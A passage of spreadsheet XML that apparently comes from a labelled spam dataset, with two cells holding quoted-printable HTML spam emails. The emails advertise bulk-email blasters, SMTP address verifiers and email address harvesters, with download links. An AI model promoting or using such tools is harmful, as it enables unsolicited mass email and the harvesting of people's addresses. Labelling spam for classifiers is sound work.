 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3E&amp;nbsp=3Blists saved as separate text 
 files=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemm=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E&amp;nbsp=3B=3C=2FP=3E
 =3CDIV=3E=3CFONT face=3DArial=3Eif you want to remove your email=2C please send email to =3CA 
 href=3D=22mailto=3Atargetemailremoval=40btamail=2Enet=2Ecn=22=3Etargetemailremoval=40btamail=2Enet=2Ecn=3C=2FA=3E=3C=2FFONT=3E 
 =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E&amp;nbsp=3B=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FDIV=3E
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D1775" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1776" hidden="1">
      <c r="A1776" s="1">
        <v>1774.0</v>
      </c>
      <c r="B1776" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C1776" s="1" t="s">
        <v>619</v>
      </c>
      <c r="D1776" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" s="1">
        <v>1775.0</v>
      </c>
      <c r="B1777" s="1" t="s">
        <v>3023</v>
      </c>
      <c r="C1777" s="1" t="s">
        <v>3024</v>
      </c>
      <c r="D1777" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" s="1">
        <v>1776.0</v>
      </c>
      <c r="B1778" s="1" t="s">
        <v>3025</v>
      </c>
      <c r="C1778" s="3" t="str">
        <f>3CBODY bgColor=3D#ffffff=3E
 =3CDIV=3E=3CFONT size=3D2=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E&amp;nbsp=3B=3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EDirect Email 
 Blaster=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CB=3E=3CFONT color=3D#006600=3E=3CI=3EThe program will send mail at the 
 rate of over 1=2C 000 e-mails per minute=2E&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ELegal and Fast 
 sending bulk emails&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EBuilt in SMTP 
 server&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3EHave Return Path&amp;nbsp=3B=3CBR=3ECan Check Mail 
 Address&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EMake Error Send Address List=28 Remove or 
 Send Again=29&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ESupport multi-threads=2E&amp;nbsp=3B=3CBR=3ESupport 
 multi-smtp servers=2E&amp;nbsp=3B=3CBR=3EManages your opt-in E-Mail Lists&amp;nbsp=3B=3CBR=3EOffers an 
 easy-to-use interface!&amp;nbsp=3B=3CBR=3EEasy to configure and use&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CA 
 href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fedeb=5Fset=2Ezip=22=3E=3CSTRONG=3EDownload 
 Now=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EMaillist 
 Verify=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EMaillist Verify is intended for e-mail addresses and mail 
 lists verifying=2E The main task is to determine which of addresses in the mail 
 list are dead=2E The program is oriented=2C basically=2C on programmers which have 
 their own mail lists to inform their users about new versions of their 
 programs=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EThe program works on the same algorithm as ISP mail systems 
 do=2E Mail servers addresses for specified address are extracted from DNS=2E The 
 program tries to connect with found SMTP-servers and simulates the sending of 
 message=2E It does not come to the message =3CNOBR=3Esending &amp;#8255=3B=2FNOBR&amp;gt=3B EMV disconnect 
 as soon as mail server informs does this address exist or not=2E EMV can 
 find=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3E&amp;nbsp=3Babout 90% of dead addresses &amp;#8255=3B=2FNOBR&amp;gt=3B some mail 
 systems receive all messages and only then see their&amp;nbsp=3B=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3Eaddresses and if the address is dead send the message 
 back with remark about it=2E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E=3CNOBR=3E
 =3CP=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemv=5Fset=2Ezip=22=3E=3CSTRONG=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email 
 Blaster&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EExpress Email Blaster&amp;nbsp=3B is a very fast=2C powerful yet 
 simple to use email sender=2E Utilizing multiple threads=2Fconnections=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3Band multiple SMTP servers your emails will be sent out 
 fast and easily=2E There are User Information=2C Attach Files=2C&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EAddress and Mail Logs four tabbed area for the E-mails 
 details for sending=2E About 25 SMTP servers come with the&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3Edemo version=2C and users may Add and Delete SMTP servers=2E 
 About =3CFONT color=3D#008000=3E=3CB=3E60=2C000=3C=2FB=3E=3C=2FFONT=3E E-mails will be sent out per 
 hour=2E=22=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbeeb=5Fset=2Ezip=22=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email Address 
 Extractor=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E=3CFONT size=3D4=3E
 =3CP=3E=3CFONT color=3D#008000 size=3D3=3EThis program is the most efficient=2C easy to use 
 email address collector available on the =3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3D#008000 size=3D3=3E&amp;nbsp=3Binternet! =3C=2FFONT=3E=3CFONT 
 color=3D#000000 size=3D3=3EBeijing Express Email Address Extractor =28ExpressEAE=29 is 
 designed to extract=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Be-mail addresses from web-pages on the 
 Internet =28using HTTP protocols=29 =2EExpressEAE=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Bsupports operation through many proxy-server 
 and works very fast=2C as it is able of&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3Eloading several pages simultaneously=2C and requires 
 very few resources=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 face=3DArial=3E=3CFONT size=3D3=3EWith it=2C you will be able 
 to=3C=2FFONT=3E=3CFONT size=3D2=3E =3C=2FFONT=3E=3CFONT size=3D3=3Euse targeted searches to crawl the 
 world wide web=2C extracting&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Ethousands of clean=2C fresh email 
 addresses=2E Ably Email address Extractor is unlike other&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eaddress collecting programs=2C which 
 limit you to one or two search engines and are unable=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3E&amp;nbsp=3Bto do auto searches HUGE address=2E 
 Most of them collect a high percentage of incomplete=2C&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eunusable addresses which will cause you 
 serious problems when using them in a mailing=2E&amp;nbsp=3B=3C=2FFONT=3E 
 =3CUL=3E
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EEasier to learn and use than any 
   other email address collector program available=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAccesses eight search 
   engines&amp;nbsp=3B=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAdd your own URLs to the list to be 
   searched=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3ESupports operation through 
   =3C=2FFONT=3E=3CFONT color=3D#ff00ff=3Ea lot of=3C=2FFONT=3E=3CFONT color=3D#008000=3E proxy-server 
   and works very fast =28HTTP Proxy=29=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAble of loading several pages 
   simultaneously=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ERequires very few resources=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ETimeout feature allows user to limit 
   the amount of time crawling in dead sites and traps=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3EEasy to make =3C=2FFONT=3E=3CFONT 
   color=3D#ff00ff=3EHuge=3C=2FFONT=3E=3CFONT color=3D#008000=3E address list=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EPause=2Fcontinue extraction at any 
   time=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAuto connection to the 
   Internet=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feeae=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Email Address 
 Downloader=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CUL=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Eis a 32 bit Windows Program for e-mail 
   marketing=2E It is intended for easy and convenient=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3E&amp;nbsp=3Bsearch large 
   e-mail address lists from mail servers=2E The program can be operated 
   on&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3EWindows 95=2F98=2FME=2F2000 
   and NT=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Esupport multi-threads =28up to 1024 
   connections=29=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas the ability&amp;nbsp=3B to reconnect to the 
   mail server if the server has disconnected and&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3Econtinue the searching 
   at the point where it has been interrupted=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas an ergonomic interface that is easy to 
   set up and simple to use=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#008000 face=3DArial 
 size=3D4=3EFeatures=3A=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
 =3CUL type=3Ddisc=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Esupport 
   multi-threads=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto get smtp server 
   address=2Csupport multi-smtp servers=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto save&amp;nbsp=3B E-Mail 
   Lists=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eoffers an easy-to-use 
   interface!=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feead=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Maillist 
 Manager=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3EThis program was designed to be a 
 complement to the =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EDirect Email Blaster&amp;nbsp=3B 
 =3C=2FFONT=3E=3CFONT color=3Dblack size=3D3=3Eand =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EEmail 
 Blaster =3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Esuite of bulk email software 
 programs=2E Its purpose is to organize your email lists in order to be 
 more&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Eeffective with your email marketing 
 campaign=2E Some of its features include=3A=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial=3E=3CFONT size=3D3=3E&amp;#8255=3BCombine several lists into 
 one file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BSplit up larger lists to make them more 
 manageable=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BRemove addresses from file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BManual editing=2C adding=2C and deleting of addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BAbility to auto clean lists=2C that is=2C remove any duplicate or unwanted 
 addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BMaintain all your address lists within the 
 program so you no&amp;nbsp=3B longer need to keep all your=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3E&amp;nbsp=3Blists saved as separate text 
 files=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemm=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E&amp;nbsp=3B=3C=2FP=3E
 =3CDIV=3E=3CFONT face=3DArial=3Eif you want to remove your email=2C please send email to =3CA 
 href=3D=22mailto=3Atargetemailremoval=40btamail=2Enet=2Ecn=22=3Etargetemailremoval=40btamail=2Enet=2Ecn=3C=2FA=3E=3C=2FFONT=3E 
 =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E&amp;nbsp=3B=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FDIV=3E=3C=2FFONT=3E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FDIV=3E
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D1778" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1779" hidden="1">
      <c r="A1779" s="1">
        <v>1777.0</v>
      </c>
      <c r="B1779" s="1" t="s">
        <v>3026</v>
      </c>
      <c r="C1779" s="1" t="s">
        <v>3027</v>
      </c>
      <c r="D1779" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1780" hidden="1">
      <c r="A1780" s="1">
        <v>1778.0</v>
      </c>
      <c r="B1780" s="1" t="s">
        <v>3028</v>
      </c>
      <c r="C1780" s="1" t="s">
        <v>3029</v>
      </c>
      <c r="D1780" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" s="1">
        <v>1779.0</v>
      </c>
      <c r="B1781" s="1" t="s">
        <v>3030</v>
      </c>
      <c r="C1781" s="1" t="s">
        <v>3031</v>
      </c>
      <c r="D1781" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1782" hidden="1">
      <c r="A1782" s="1">
        <v>1780.0</v>
      </c>
      <c r="B1782" s="1" t="s">
        <v>2360</v>
      </c>
      <c r="C1782" s="1" t="s">
        <v>3032</v>
      </c>
      <c r="D1782" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1783" hidden="1">
      <c r="A1783" s="1">
        <v>1781.0</v>
      </c>
      <c r="B1783" s="1" t="s">
        <v>3033</v>
      </c>
      <c r="C1783" s="1" t="s">
        <v>3034</v>
      </c>
      <c r="D1783" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1784" hidden="1">
      <c r="A1784" s="1">
        <v>1782.0</v>
      </c>
      <c r="B1784" s="1" t="s">
        <v>3035</v>
      </c>
      <c r="C1784" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="D1784" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1785" hidden="1">
      <c r="A1785" s="1">
        <v>1783.0</v>
      </c>
      <c r="B1785" s="1" t="s">
        <v>2719</v>
      </c>
      <c r="C1785" s="1" t="s">
        <v>3037</v>
      </c>
      <c r="D1785" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1786" hidden="1">
      <c r="A1786" s="1">
        <v>1784.0</v>
      </c>
      <c r="B1786" s="1" t="s">
        <v>3038</v>
      </c>
      <c r="C1786" s="1" t="s">
        <v>3039</v>
      </c>
      <c r="D1786" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1787" hidden="1">
      <c r="A1787" s="1">
        <v>1785.0</v>
      </c>
      <c r="B1787" s="1" t="s">
        <v>44</v>
      </c>
      <c r="C1787" s="1" t="s">
        <v>45</v>
      </c>
      <c r="D1787" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1788" hidden="1">
      <c r="A1788" s="1">
        <v>1786.0</v>
      </c>
      <c r="B1788" s="1" t="s">
        <v>630</v>
      </c>
      <c r="C1788" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="D1788" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1789" hidden="1">
      <c r="A1789" s="1">
        <v>1787.0</v>
      </c>
      <c r="B1789" s="1" t="s">
        <v>3040</v>
      </c>
      <c r="C1789" s="1" t="s">
        <v>3041</v>
      </c>
      <c r="D1789" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1790" hidden="1">
      <c r="A1790" s="1">
        <v>1788.0</v>
      </c>
      <c r="B1790" s="1" t="s">
        <v>1190</v>
      </c>
      <c r="C1790" s="1" t="s">
        <v>3042</v>
      </c>
      <c r="D1790" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1791" hidden="1">
      <c r="A1791" s="1">
        <v>1789.0</v>
      </c>
      <c r="B1791" s="1" t="s">
        <v>3043</v>
      </c>
      <c r="C1791" s="1" t="s">
        <v>3044</v>
      </c>
      <c r="D1791" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1792" hidden="1">
      <c r="A1792" s="1">
        <v>1790.0</v>
      </c>
      <c r="B1792" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C1792" s="1" t="s">
        <v>329</v>
      </c>
      <c r="D1792" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" s="1">
        <v>1791.0</v>
      </c>
      <c r="B1793" s="1" t="s">
        <v>3045</v>
      </c>
      <c r="C1793" s="1" t="s">
        <v>3046</v>
      </c>
      <c r="D1793" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1794" hidden="1">
      <c r="A1794" s="1">
        <v>1792.0</v>
      </c>
      <c r="B1794" s="1" t="s">
        <v>3047</v>
      </c>
      <c r="C1794" s="1" t="s">
        <v>3048</v>
      </c>
      <c r="D1794" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1795" hidden="1">
      <c r="A1795" s="1">
        <v>1793.0</v>
      </c>
      <c r="B1795" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C1795" s="1" t="s">
        <v>3049</v>
      </c>
      <c r="D1795" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1796" hidden="1">
      <c r="A1796" s="1">
        <v>1794.0</v>
      </c>
      <c r="B1796" s="1" t="s">
        <v>3050</v>
      </c>
      <c r="C1796" s="1" t="s">
        <v>3051</v>
      </c>
      <c r="D1796" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1797" hidden="1">
      <c r="A1797" s="1">
        <v>1795.0</v>
      </c>
      <c r="B1797" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C1797" s="1" t="s">
        <v>3052</v>
      </c>
      <c r="D1797" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1798" hidden="1">
      <c r="A1798" s="1">
        <v>1796.0</v>
      </c>
      <c r="B1798" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C1798" s="1" t="s">
        <v>3053</v>
      </c>
      <c r="D1798" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1799" hidden="1">
      <c r="A1799" s="1">
        <v>1797.0</v>
      </c>
      <c r="B1799" s="1" t="s">
        <v>338</v>
      </c>
      <c r="C1799" s="1" t="s">
        <v>3054</v>
      </c>
      <c r="D1799" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1800" hidden="1">
      <c r="A1800" s="1">
        <v>1798.0</v>
      </c>
      <c r="B1800" s="1" t="s">
        <v>3055</v>
      </c>
      <c r="C1800" s="1" t="s">
        <v>3056</v>
      </c>
      <c r="D1800" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" s="1">
        <v>1799.0</v>
      </c>
      <c r="B1801" s="1" t="s">
        <v>3057</v>
      </c>
      <c r="C1801" s="1" t="s">
        <v>3058</v>
      </c>
      <c r="D1801" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1802" hidden="1">
      <c r="A1802" s="1">
        <v>1800.0</v>
      </c>
      <c r="B1802" s="1" t="s">
        <v>3059</v>
      </c>
      <c r="C1802" s="1" t="s">
        <v>3060</v>
      </c>
      <c r="D1802" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" s="1">
        <v>1801.0</v>
      </c>
      <c r="B1803" s="1" t="s">
        <v>3061</v>
      </c>
      <c r="C1803" s="1" t="s">
        <v>3062</v>
      </c>
      <c r="D1803" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" s="1">
        <v>1802.0</v>
      </c>
      <c r="B1804" s="1" t="s">
        <v>3063</v>
      </c>
      <c r="C1804" s="1" t="s">
        <v>3064</v>
      </c>
      <c r="D1804" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" s="1">
        <v>1803.0</v>
      </c>
      <c r="B1805" s="1" t="s">
        <v>3065</v>
      </c>
      <c r="C1805" s="1" t="s">
        <v>3066</v>
      </c>
      <c r="D1805" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1806" hidden="1">
      <c r="A1806" s="1">
        <v>1804.0</v>
      </c>
      <c r="B1806" s="1" t="s">
        <v>3067</v>
      </c>
      <c r="C1806" s="1" t="s">
        <v>3068</v>
      </c>
      <c r="D1806" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1807" hidden="1">
      <c r="A1807" s="1">
        <v>1805.0</v>
      </c>
      <c r="B1807" s="1" t="s">
        <v>3069</v>
      </c>
      <c r="C1807" s="1" t="s">
        <v>3070</v>
      </c>
      <c r="D1807" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1808" hidden="1">
      <c r="A1808" s="1">
        <v>1806.0</v>
      </c>
      <c r="B1808" s="1" t="s">
        <v>3071</v>
      </c>
      <c r="C1808" s="1" t="s">
        <v>3072</v>
      </c>
      <c r="D1808" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1809" hidden="1">
      <c r="A1809" s="1">
        <v>1807.0</v>
      </c>
      <c r="B1809" s="1" t="s">
        <v>3073</v>
      </c>
      <c r="C1809" s="1" t="s">
        <v>3074</v>
      </c>
      <c r="D1809" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1810" hidden="1">
      <c r="A1810" s="1">
        <v>1808.0</v>
      </c>
      <c r="B1810" s="1" t="s">
        <v>3075</v>
      </c>
      <c r="C1810" s="1" t="s">
